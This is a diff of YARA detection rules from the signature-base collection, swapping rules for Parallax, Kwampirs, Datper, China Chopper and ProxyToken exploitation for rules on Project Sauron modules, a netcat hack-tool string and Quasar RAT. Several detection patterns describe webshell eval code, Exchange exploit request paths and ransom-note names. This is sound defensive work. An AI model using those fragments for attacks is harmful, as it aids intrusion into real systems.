+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$main_call = { 68 81 85 50 00 e8 ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8d ?? ?? ?? ?? ?? 51 ff ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? 68 00 10 00 00 68 b0 a2 00 00 ff ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? 68 8c e1 4f 00 ff ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? 83 c4 0c 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? ?? ?? ?? 03 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? 68 40 84 50 00 8d ?? ?? ?? ?? ?? 51 e8 ?? ?? ?? ?? 83 c4 0c}
-		$decoder_call = { 55 8b ec 83 c4 f8 33 c0 89 ?? ?? 33 d2 89 ?? ?? 8b ?? ?? 3b ?? ?? 7d ?? 8b ?? ?? 8b ?? ?? 8b ?? ?? 8b ?? ?? 33 ?? ?? ?? ?? ?? ?? 8b ?? ?? 8b ?? ?? 89 ?? ?? 83 ?? ?? ?? 75 ?? 33 d2 89 ?? ?? eb ?? ff ?? ?? ff ?? ?? 8b ?? ?? 3b ?? ?? 7c ?? 59 59 5d c3}
+		$x1 = "64, 64url, 32, 32url or 16."
+		$s2 = "Force decoding when input is invalid/corrupt"
+		$s3 = "This cruft"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them
+		$x1 or 2 of them
 }
-rule SIGNATURE_BASE_Crime_Win32_Parallax_Payload_1 : FILE
+rule SIGNATURE_BASE_APT_Project_Sauron_Dext_Module
 {
 	meta:
-		description = "Detects Parallax Injected Payload v1.01"
-		author = "@VK_Intel"
-		id = "f3a23a28-e322-59ff-85e0-72e44def5c02"
-		date = "2020-02-24"
+		description = "Detects strings from dext module - Project Sauron report by Kaspersky"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d69373e0-d6ad-5475-8766-06e865620ed8"
+		date = "2016-08-08"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/VK_Intel/status/1227976106227224578"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_parallax_rat.yar#L20-L38"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L89-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3a1718d7caea5bd6741dd39fc16f955e1d3c73a282d51eda5b63c3352404529e"
+		logic_hash = "7dbfb3ddfffa6fa65800e07fdcc527650474740afa658567efe46830587cedae"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "20d0be64a0e0c2e96729143d41b334603f5d3af3838a458b0627af390ae33fbc"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$zwdelay_prologue = { 66 ?? ?? ?? 66 83 c1 01 66 ?? ?? ?? 50 b8 cb cb cb cb 89 ?? ?? ?? ?? ?? 58 8b ?? ?? ?? ?? ?? 89 ?? ?? 68 88 13 00 00 8b ?? ?? 8b ?? ?? 51 e8 ?? ?? ?? ??}
-		$wininet_call = { b8 77 00 00 00 66 ?? ?? ?? b9 69 00 00 00 66 ?? ?? ?? ba 6e 00 00 00 66 ?? ?? ?? b8 69 00 00 00 66 ?? ?? ?? b9 6e 00 00 00 66 ?? ?? ?? ba 65 00 00 00 66 ?? ?? ?? b8 74 00 00 00 66 ?? ?? ?? 33 c9 66 ?? ?? ?? 8d ?? ?? 52 8b ?? ?? 8b ?? ?? ff d1 89 ?? ?? 6a 00 68 0c fc e5 f2 8b ?? ?? 52 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 3d a8 16 da 8b ?? ?? 50 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 e0 05 65 01 8b ?? ?? 51 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 f5 98 c0 6c 8b ?? ?? 52 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 24 1d 19 e5 8b ?? ?? 50 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 68 a8 ed f2 ce 8b ?? ?? 8b ?? ?? 52 e8 ?? ?? ?? ?? 83 c4 0c 89 ?? ?? 6a 00 6a 00 ff ?? ?? 85 c0 75 ?? 68 88 13 00 00 ff ?? ?? eb ?? 6a 00 68 00 01 00 04 6a }
-		$rand_png_call = { b8 25 00 00 00 66 ?? ?? ?? ?? ?? ?? b9 78 00 00 00 66 ?? ?? ?? ?? ?? ?? ba 2e 00 00 00 66 ?? ?? ?? ?? ?? ?? b8 70 00 00 00 66 ?? ?? ?? ?? ?? ?? b9 6e 00 00 00 66 ?? ?? ?? ?? ?? ?? ba 67 00 00 00 66 ?? ?? ?? ?? ?? ?? 33 c0 66 ?? ?? ?? ?? ?? ?? 6a 64 6a 40 8b ?? ?? 8b ?? ?? ff d2 89 ?? ?? 8b ?? ?? 50 68 00 e1 f5 05 68 10 27 00 00 e8 ?? ?? ?? ??}
+		$x1 = "Assemble rows of DNS names back to a single string of data"
+		$x2 = "removes checks of DNS names and lengths (during split)"
+		$x3 = "Randomize data lengths (length/2 to length)"
+		$x4 = "This cruft"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+		2 of them
 }
-
-rule SIGNATURE_BASE_SUSP_NVIDIA_LAPSUS_Leak_Compromised_Cert_Mar22_1 : FILE
+rule SIGNATURE_BASE_Hacktool_This_Cruft : FILE
 {
 	meta:
-		description = "Detects a binary signed with the leaked NVIDIA certifcate and compiled after March 1st 2022"
+		description = "Detects string 'This cruft' often used in hack tools like netcat or cryptcat and also mentioned in Project Sauron report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8bc7460f-a1c4-5157-8c2d-34d3a6c9c7e9"
-		date = "2022-03-03"
-		modified = "2022-03-04"
-		reference = "https://twitter.com/cyb3rops/status/1499514240008437762"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_nvidia_leaked_cert.yar#L4-L22"
+		id = "a39de541-19b5-5b7e-a3dc-51a5309181e5"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L106-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e7e9e58ec1e3922471ad3ffd4ad9fbb3ac4b3c3841c35d1cd8886607f3cf1ab9"
-		score = 70
+		logic_hash = "875c34e8048c3f98afc97683d0b3086c3396753cd9fb14bc68681c63ed77fd51"
+		score = 60
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$x1 = "This cruft" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100MB and pe.timestamp > 1646092800 and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "VeriSign Class 3 Code Signing 2010 CA" and ( pe.signatures [ i ] . serial == "43:bb:43:7d:60:98:66:28:6d:d8:39:e1:d0:03:09:f5" or pe.signatures [ i ] . serial == "14:78:1b:c8:62:e8:dc:50:3a:55:93:46:f5:dc:c5:18" ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and $x1 )
 }
-rule SIGNATURE_BASE_SUSP_RANSOMWARE_Indicator_Jul20 : FILE
+rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M1 : FILE
 {
 	meta:
-		description = "Detects ransomware indicator"
+		description = "Detects malware from Project Sauron APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6036fdfd-8474-5d79-ac75-137ac2efdc77"
-		date = "2020-07-28"
+		id = "c741bd7d-1885-55f1-a5b3-8f00fda2fe39"
+		date = "2016-08-09"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_generic.yar#L2-L35"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L130-L148"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3dd1b29f45afba16d58619416e0d420acd38fb8ae1fc846035229a27b9e5c9d9"
-		score = 60
+		logic_hash = "c81c996e487bdd840111513724ccf1220ee3bd8280d776aa4c128ef5263ee136"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6"
-		hash2 = "5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473"
-		hash3 = "6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9572624b6026311a0e122835bcd7200eca396802000d0777dba118afaaf9f2a9"
 
 	strings:
-		$ = "Decrypt.txt" ascii wide
-		$ = "DecryptFiles.txt" ascii wide
-		$ = "Decrypt-Files.txt" ascii wide
-		$ = "DecryptFilesHere.txt" ascii wide
-		$ = "DECRYPT.txt" ascii wide
-		$ = "DecryptFiles.txt" ascii wide
-		$ = "DECRYPT-FILES.txt" ascii wide
-		$ = "DecryptFilesHere.txt" ascii wide
-		$ = "DECRYPT_INSTRUCTION.TXT" ascii wide
-		$ = "FILES ENCRYPTED.txt" ascii wide
-		$ = "DECRYPT MY FILES" ascii wide
-		$ = "DECRYPT-MY-FILES" ascii wide
-		$ = "DECRYPT_MY_FILES" ascii wide
-		$ = "DECRYPT YOUR FILES" ascii wide
-		$ = "DECRYPT-YOUR-FILES" ascii wide
-		$ = "DECRYPT_YOUR_FILES" ascii wide
-		$ = "DECRYPT FILES.txt" ascii wide
+		$s1 = "ncnfloc.dll" fullword wide
+		$s4 = "Network Configuration Locator" fullword wide
+		$op0 = { 80 75 6e 85 c0 79 6a 66 41 83 38 0a 75 63 0f b7 }
+		$op1 = { 80 75 29 85 c9 79 25 b9 01 }
+		$op2 = { 2b d8 48 89 7c 24 38 44 89 6c 24 40 83 c3 08 89 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1400KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of ( $s* ) ) and 1 of ( $op* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_LOG_EXPL_Proxytoken_Exploitation_Aug21_1 : CVE_2021_33766
+rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M2 : FILE
 {
 	meta:
-		description = "Detects ProxyToken CVE-2021-33766 exploitation attempts on an unpatched system"
+		description = "Detects malware from Project Sauron APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f4840140-6d31-52f9-b1a0-2acdd4b955cd"
-		date = "2021-08-30"
+		id = "79abe5f2-a750-5018-a67f-6ee1c51a2ca1"
+		date = "2016-08-09"
 		modified = "2023-12-05"
-		reference = "https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2021_33766_proxytoken.yar#L2-L21"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L150-L167"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ff0c3e4f7491f5faec3e2688819ea5ec636a7d4eb57941afff6f53f60b0c0293"
+		logic_hash = "57099a802ee62a5183156f0b30713553b6fd83bbb5e1b453e9b25da0109b8777"
 		score = 75
 		quality = 85
-		tags = "CVE-2021-33766"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "30a824155603c2e9d8bfd3adab8660e826d7e0681e28e46d102706a03e23e3a8"
 
 	strings:
-		$ss0 = "POST " ascii
-		$ss1 = " 500 0 0"
-		$sa1 = "/ecp/" ascii
-		$sa2 = "/RulesEditor/InboxRules.svc/NewObject" ascii
-		$sb1 = "/ecp/" ascii
-		$sb2 = "SecurityToken=" ascii
+		$s2 = "\\*\\3vpn" ascii
+		$op0 = { 55 8b ec 83 ec 0c 53 56 33 f6 39 75 08 57 89 75 }
+		$op1 = { 59 59 c3 8b 65 e8 ff 75 88 ff 15 50 20 40 00 ff }
+		$op2 = { 8b 4f 06 85 c9 74 14 83 f9 12 0f 82 a7 }
 
 	condition:
-		all of ( $ss* ) and ( all of ( $sa* ) or all of ( $sb* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( all of ( $s* ) ) and all of ( $op* ) )
 }
-
-rule SIGNATURE_BASE_Cmstar_Malware_Sep17 : FILE
+rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M3 : FILE
 {
 	meta:
-		description = "Detects CMStar Malware"
+		description = "Detects malware from Project Sauron APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d6c9cd7f-06ce-5641-b9b2-c81daf18628d"
-		date = "2017-10-03"
+		id = "555b37a2-6a3c-539f-81dc-24c739795510"
+		date = "2016-08-09"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/pTffPA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cmstar.yar#L13-L31"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L169-L186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "498b6a3e02cf4979babe6379c2d6b3529d2a28210d44a8ce05aef1acdd325953"
+		logic_hash = "739414990d112dd16e01831408ba745b04fae7621eb9074f73babbc40b69e1ad"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "16697c95db5add6c1c23b2591b9d8eec5ed96074d057b9411f0b57a54af298d5"
+		hash1 = "a4736de88e9208eb81b52f29bab9e7f328b90a86512bd0baadf4c519e948e5ec"
 
 	strings:
-		$s1 = "UpdateService.tmp" fullword ascii
-		$s2 = "StateNum:%d,FileSize:%d" fullword ascii
+		$s1 = "ExampleProject.dll" fullword ascii
+		$op0 = { 8b 4f 06 85 c9 74 14 83 f9 13 0f 82 ba }
+		$op1 = { ff 15 34 20 00 10 85 c0 59 a3 60 30 00 10 75 04 }
+		$op2 = { 55 8b ec ff 4d 0c 75 09 ff 75 08 ff 15 00 20 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "22021985de78a48ea8fb82a2ff9eb693" or pe.exports ( "WinCred" ) or all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) ) and all of ( $op* ) )
 }
-rule SIGNATURE_BASE_MAL_Kwampirs_Apr18 : KWAMPIRS
+rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M4 : FILE
 {
 	meta:
-		description = "Kwampirs dropper and main payload components"
-		author = "Symantec"
-		id = "298e2868-e90e-55b4-9115-9f0b43521266"
-		date = "2018-04-23"
+		description = "Detects malware from Project Sauron APT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "32717ace-ff56-5b5b-8ed9-4bb353886eea"
+		date = "2016-08-09"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_kwampirs.yar#L1-L70"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L188-L206"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e9387c46b9e3fff90415c46af270d143bdeb6292f2521d889b8d6ae726a4cf3b"
+		logic_hash = "0735ba9591a9cf06cd13ba480b4559ef83105ab08ffcec21ebbbfdf3766edb93"
 		score = 75
 		quality = 85
-		tags = "KWAMPIRS"
-		family = "Kwampirs"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e12e66a6127cfd2cbb42e6f0d57c9dd019b02768d6f1fb44d91f12d90a611a57"
 
 	strings:
-		$pubkey = {
-            06 02 00 00 00 A4 00 00 52 53 41 31 00 08 00 00
-            01 00 01 00 CD 74 15 BC 47 7E 0A 5E E4 35 22 A5
-            97 0C 65 BE E0 33 22 F2 94 9D F5 40 97 3C 53 F9
-            E4 7E DD 67 CF 5F 0A 5E F4 AD C9 CF 27 D3 E6 31
-            48 B8 00 32 1D BE 87 10 89 DA 8B 2F 21 B4 5D 0A
-            CD 43 D7 B4 75 C9 19 FE CC 88 4A 7B E9 1D 8C 11
-            56 A6 A7 21 D8 C6 82 94 C1 66 11 08 E6 99 2C 33
-            02 E2 3A 50 EA 58 D2 A7 36 EE 5A D6 8F 5D 5D D2
-            9E 04 24 4A CE 4C B6 91 C0 7A C9 5C E7 5F 51 28
-            4C 72 E1 60 AB 76 73 30 66 18 BE EC F3 99 5E 4B
-            4F 59 F5 56 AD 65 75 2B 8F 14 0C 0D 27 97 12 71
-            6B 49 08 84 61 1D 03 BA A5 42 92 F9 13 33 57 D9
-            59 B3 E4 05 F9 12 23 08 B3 50 9A DA 6E 79 02 36
-            EE CE 6D F3 7F 8B C9 BE 6A 7E BE 8F 85 B8 AA 82
-            C6 1E 14 C6 1A 28 29 59 C2 22 71 44 52 05 E5 E6
-            FE 58 80 6E D4 95 2D 57 CB 99 34 61 E9 E9 B3 3D
-            90 DC 6C 26 5D 70 B4 78 F9 5E C9 7D 59 10 61 DF
-            F7 E4 0C B3
-        }
-		$network_xor_key = {
-            B7 E9 F9 2D F8 3E 18 57 B9 18 2B 1F 5F D9 A5 38
-            C8 E7 67 E9 C6 62 9C 50 4E 8D 00 A6 59 F8 72 E0
-            91 42 FF 18 A6 D1 81 F2 2B C8 29 EB B9 87 6F 58
-            C2 C9 8E 75 3F 71 ED 07 D0 AC CE 28 A1 E7 B5 68
-            CD CF F1 D8 2B 26 5C 31 1E BC 52 7C 23 6C 3E 6B
-            8A 24 61 0A 17 6C E2 BB 1D 11 3B 79 E0 29 75 02
-            D9 25 31 5F 95 E7 28 28 26 2B 31 EC 4D B3 49 D9
-            62 F0 3E D4 89 E4 CC F8 02 41 CC 25 15 6E 63 1B
-            10 3B 60 32 1C 0D 5B FA 52 DA 39 DF D1 42 1E 3E
-            BD BC 17 A5 96 D9 43 73 3C 09 7F D2 C6 D4 29 83
-            3E 44 44 6C 97 85 9E 7B F0 EE 32 C3 11 41 A3 6B
-            A9 27 F4 A3 FB 2B 27 2B B6 A6 AF 6B 39 63 2D 91
-            75 AE 83 2E 1E F8 5F B5 65 ED B3 40 EA 2A 36 2C
-            A6 CF 8E 4A 4A 3E 10 6C 9D 28 49 66 35 83 30 E7
-            45 0E 05 ED 69 8D CF C5 40 50 B1 AA 13 74 33 0F
-            DF 41 82 3B 1A 79 DC 3B 9D C3 BD EA B1 3E 04 33
-        }
-		$decrypt_string = {
-            85 DB 75 09 85 F6 74 05 89 1E B0 01 C3 85 FF 74
-            4F F6 C3 01 75 4A 85 F6 74 46 8B C3 D1 E8 33 C9
-            40 BA 02 00 00 00 F7 E2 0F 90 C1 F7 D9 0B C8 51
-            E8 12 28 00 00 89 06 8B C8 83 C4 04 33 C0 85 DB
-            74 16 8B D0 83 E2 0F 8A 92 1C 33 02 10 32 14 38
-            40 88 11 41 3B C3 72 EA 66 C7 01 00 00 B0 01 C3
-            32 C0 C3
-        }
-		$init_strings = {
-            55 8B EC 83 EC 10 33 C9 B8 0D 00 00 00 BA 02 00
-            00 00 F7 E2 0F 90 C1 53 56 57 F7 D9 0B C8 51 E8
-            B3 27 00 00 BF 05 00 00 00 8D 77 FE BB 4A 35 02
-            10 2B DE 89 5D F4 BA 48 35 02 10 4A BB 4C 35 02
-            10 83 C4 04 2B DF A3 C8 FC 03 10 C7 45 FC 00 00
-            00 00 8D 4F FC 89 55 F8 89 5D F0 EB 06
-        }
+		$s1 = "xpsmngr.dll" fullword wide
+		$s2 = "XPS Manager" fullword wide
+		$op0 = { 89 4d e8 89 4d ec 89 4d f0 ff d2 3d 08 00 00 c6 }
+		$op1 = { 55 8b ec ff 4d 0c 75 09 ff 75 08 ff 15 04 20 5b }
+		$op2 = { 8b 4f 06 85 c9 74 14 83 f9 13 0f 82 b6 }
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 90KB and ( all of ( $s* ) ) and 1 of ( $op* ) ) or ( all of them )
 }
-
-rule SIGNATURE_BASE_Datper_Backdoor : FILE
+rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M6 : FILE
 {
 	meta:
-		description = "Detects Datper Malware"
+		description = "Detects malware from Project Sauron APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "547db8bb-cc02-5521-8b85-845b1652fee9"
-		date = "2017-08-21"
+		id = "1aa6dd43-52ac-5321-9941-767833073c37"
+		date = "2016-08-09"
 		modified = "2023-12-05"
-		reference = "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_tick_datper.yar#L13-L45"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L208-L226"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "eacdc648226f20fa3847f0b5e8cafcee59cc1c6274cabb885db297f5b5fceafb"
+		logic_hash = "95ca9a0b2e71e7152d20a01d238e7362024c6dac6fc95ed2ebfa96dcbc8dbd40"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7d70d659c421b50604ce3e0a1bf423ab7e54b9df361360933bac3bb852a31849"
-		hash2 = "331ac0965b50958db49b7794cc819b2945d7b5e5e919c185d83e997e205f107b"
-		hash3 = "90ac1fb148ded4f46949a5fea4cd8c65d4ea9585046d66459328a5866f8198b2"
-		hash4 = "12d9b4ec7f8ae42c67a6fd030efb027137dbe29e63f6f669eb932d0299fbe82f"
-		hash5 = "2384e8ad8eee6db1e69b3ee7b6b3d01ae09f99a86901a0a87fb2788c1115090c"
-		hash6 = "1e511c32cdf8abe23d8ba7c39da5ce7fc6c87fdb551c9fc3265ee22ac4076e27"
-		hash7 = "7bc042b9a599e1024a668b9921e2a42a02545429cf446d5b3d21f20185afa6ce"
+		hash1 = "3782b63d7f6f688a5ccb1b72be89a6a98bb722218c9f22402709af97a41973c8"
 
 	strings:
-		$s1 = "RtlGetCo" fullword ascii
-		$s2 = "hutils" fullword ascii
-		$s3 = "kza2FWU,f;\"3U&zpa3U(W`J" fullword ascii
-		$c1 = "dkkwldngn" fullword ascii
-		$c2 = "ndkkwqgcm" fullword ascii
+		$s1 = "rseceng.dll" fullword wide
+		$s2 = "Remote Security Engine" fullword wide
+		$op0 = { 8b 0d d5 1d 00 00 85 c9 0f 8e a2 }
+		$op1 = { 80 75 6e 85 c0 79 6a 66 41 83 38 0a 75 63 0f b7 }
+		$op2 = { 80 75 29 85 c9 79 25 b9 01 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "58db98e2334746d349d607e4d73bc5ea" or pe.imphash ( ) == "8fbed921458af485ce84fb7d9b13899e" or ( 2 of ( $s* ) and 1 of ( $c* ) ) or ( $s3 and $c1 ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of ( $s* ) ) and 1 of ( $op* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Chinachopper_Generic : FILE
+rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M7 : FILE
 {
 	meta:
-		description = "China Chopper Webshells - PHP and ASPX"
+		description = "Detects malware from Project Sauron APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2473cef1-88cf-5b76-a87a-2978e6780b4f"
-		date = "2015-03-10"
-		modified = "2022-10-27"
-		reference = "https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_webshell_chinachopper.yar#L2-L19"
+		id = "c5e83e1a-872d-53b3-a74a-b1a9b4a89168"
+		date = "2016-08-09"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L228-L261"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "34cb81b077d6dae5b4565001b2ab28897c6c554f00aa102601fb9c416c6c0f09"
+		logic_hash = "d132ddeb1d26b035565d3707b73d401fb413315febe26ac291cb05bfeca7c41d"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6c8c93069831a1b60279d2b316fd36bffa0d4c407068dbef81b8e2fe8fd8e8cd"
+		hash2 = "7cc0bf547e78c8aaf408495ceef58fa706e6b5d44441fefdce09d9f06398c0ca"
 
 	strings:
-		$x_aspx = /%@\sPage\sLanguage=.Jscript.%><%eval\(Request\.Item\[.{,100}unsafe/
-		$x_php = /<?php.\@eval\(\$_POST./
-		$fp1 = "GET /"
-		$fp2 = "POST /"
+		$sx1 = "Default user" fullword wide
+		$sx2 = "Hincorrect header check" fullword ascii
+		$sa1 = "MSAOSSPC.dll" fullword ascii
+		$sa2 = "MSAOSSPC.DLL" fullword wide
+		$sa3 = "MSAOSSPC" fullword wide
+		$sa4 = "AOL Security Package" fullword wide
+		$sa5 = "AOL Security Package" fullword wide
+		$sa6 = "AOL Client for 32 bit platforms" fullword wide
+		$op0 = { 8b ce 5b e9 4b ff ff ff 55 8b ec 51 53 8b 5d 08 }
+		$op1 = { e8 0a fe ff ff 8b 4d 14 89 46 04 89 41 04 8b 45 }
+		$op2 = { e9 29 ff ff ff 83 7d fc 00 0f 84 cf 0a 00 00 8b }
+		$op3 = { 83 f8 0c 0f 85 3a 01 00 00 44 2b 41 6c 41 8b c9 }
+		$op4 = { 44 39 57 0c 0f 84 d6 0c 00 00 44 89 6f 18 45 89 }
+		$op5 = { c1 ed 02 83 c6 fe e9 68 fe ff ff 44 39 57 08 75 }
 
 	condition:
-		filesize < 300KB and 1 of ( $x* ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( ( 3 of ( $s* ) and 3 of ( $op* ) ) or ( 1 of ( $sx* ) and 1 of ( $sa* ) ) )
 }
-rule SIGNATURE_BASE_Shifu_Banking_Trojan : FILE
+rule SIGNATURE_BASE_Quasar_RAT_Jan18_1 : FILE
 {
 	meta:
-		description = "Detects Shifu Banking Trojan"
+		description = "Detects Quasar RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e86a98b1-a5c3-57b6-9449-dc36c04cebf3"
-		date = "2015-09-01"
+		id = "52408897-bfec-5726-9d01-6ff982d50c28"
+		date = "2018-01-29"
 		modified = "2023-12-05"
-		reference = "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_shifu_trojan.yar#L8-L27"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/"
